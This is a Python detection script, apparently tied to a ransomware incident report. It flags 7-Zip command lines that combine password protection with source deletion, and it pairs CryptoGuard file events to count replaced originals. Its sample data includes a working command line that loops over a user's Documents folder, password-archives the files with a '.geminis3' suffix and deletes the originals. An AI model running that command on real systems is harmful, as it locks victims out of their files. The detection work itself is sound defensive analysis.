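import re
from collections import Counter

ARCHIVERS = {"7z.exe", "7za.exe", "7zg.exe"}            # assumed archiver images
ARCHIVE_EXTS = {"zip", "7z", "rar", "tar", "gz", "xz"}  # expected archive suffixes

# Constructed command lines modelled on the Process Trace in the report.
MALICIOUS_CMDLINE = (r'C:\Windows\system32\cmd.exe /c for /r %USERPROFILE%\Documents %d in '
                     r'(*.docx *.jpg *.zip) do "C:\PROGRA~1\7-ZIP\7Z.EXE" a -tzip -mx0 -sdel '
                     r'-p32113 "%d.geminis3" "%d"')
BENIGN_CMDLINE = (r'"C:\Program Files\7-Zip\7z.exe" a -t7z -mx9 '
                  r'"D:\Backups\docs-2020-04.7z" "C:\Users\admin\Documents"')

# Constructed CryptoGuard file-activity entries (path line, then action line).
SAMPLE_FILE_EVENTS = r"""
8 \Device\HarddiskVolume1\Users\admin\Documents\report.docx
Opened, Deleted L19238769 P4984 #9
9*\Device\HarddiskVolume1\Users\admin\Documents\report.docx.geminis3
Created L0, Write T19239424 H19239254|^236 P4984 #10,11
10*\Device\HarddiskVolume1\Users\admin\Documents\report.docx
Opened L19238769, Read T19238912|100% H38477538|200%|^181818 P4984 #11,10
11 \Device\HarddiskVolume1\ProgramData\Vendor\settings.dat
Opened L8908, Read T9216|100% H17788|199%|^326915 P4984 #13
16 \Device\HarddiskVolume1\Users\admin\Documents\photo.jpg
Opened, Deleted L4372785 P3368 #18
17*\Device\HarddiskVolume1\Users\admin\Documents\photo.jpg.geminis3
Created L0, Write T4373504 H4373093|^306 P3368 #19,20
""".strip().splitlines()


def _tokens(cmdline):
    """Split a Windows command line, keeping double-quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def assess_archiver_cmdline(cmdline):
    """Score one process command line for archiver-as-encryptor behaviour.

    'ransomware-like' means the archiver was told both to protect the
    output with a password (-p) and to delete the sources (-sdel): the
    originals become unreadable without the password, which is what an
    encryptor achieves. The other indicators are returned so an analyst
    can weigh them (unusual output suffix, for-loop over a profile
    directory, user documents in scope).
    """
    toks = _tokens(cmdline)
    idx = next((i for i, t in enumerate(toks)
                if t.replace("/", "\\").rsplit("\\", 1)[-1].lower() in ARCHIVERS), None)
    if idx is None or idx + 1 >= len(toks) or toks[idx + 1].lower() != "a":
        return {"verdict": "not-archiver"}          # no archiver 'add' command found
    args = toks[idx + 2:]
    switches = [a.lower() for a in args if a.startswith("-")]
    operands = [a for a in args if not a.startswith("-")]
    out = operands[0] if operands else ""            # first operand is the archive name
    out_ext = out.rsplit(".", 1)[-1].lower() if "." in out else ""
    has_password = any(s.startswith("-p") for s in switches)
    deletes_source = "-sdel" in switches
    return {
        "verdict": "ransomware-like" if has_password and deletes_source else "archive",
        "has_password": has_password,
        "deletes_source": deletes_source,
        "odd_extension": out_ext not in ARCHIVE_EXTS,
        "loop_driven": bool(re.search(r"\bfor\s+/r\b", cmdline, re.I)),
        "in_user_docs": bool(re.search(r"\\users\\|%userprofile%", cmdline, re.I)),
        "output": out,
    }


def summarize_cryptoguard_files(lines):
    """Pair CryptoGuard file entries to count originals replaced by copies.

    A 'Created ... Write' of <path>.<marker> together with an
    'Opened, Deleted' of <path> means the original was rewritten under a
    new name and then removed. Returns the count and the dominant marker.
    """
    created, deleted, path = set(), set(), None
    for line in lines:
        m = re.match(r"^\d+\*?\s*(\\Device\\.+)$", line.strip())
        if m:                        # path line: remember it for the next action line
            path = m.group(1)
            continue
        if path is not None:
            if line.startswith("Created") and "Write" in line:
                created.add(path)
            elif "Deleted" in line:
                deleted.add(path)
        path = None
    pairs = [c for c in created if "." in c and c.rsplit(".", 1)[0] in deleted]
    markers = Counter("." + c.rsplit(".", 1)[1] for c in pairs)
    return {"replaced": len(pairs),
            "marker": markers.most_common(1)[0][0] if markers else None}


if __name__ == "__main__":
    for name, cmd in (("malicious", MALICIOUS_CMDLINE), ("benign", BENIGN_CMDLINE)):
        print(name, assess_archiver_cmdline(cmd))
    print("file events:", summarize_cryptoguard_files(SAMPLE_FILE_EVENTS))
```

The command-line check is deliberately narrow: a password alone or a backup that deletes sources alone is ordinary admin work, so only the combination is called ransomware-like, and the weaker indicators are surfaced rather than scored. The file-event pairing is independent of the tool used, which is the same reason CryptoGuard can stop a signed archiver here: the behaviour, not the binary, is what identifies the attack.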
 
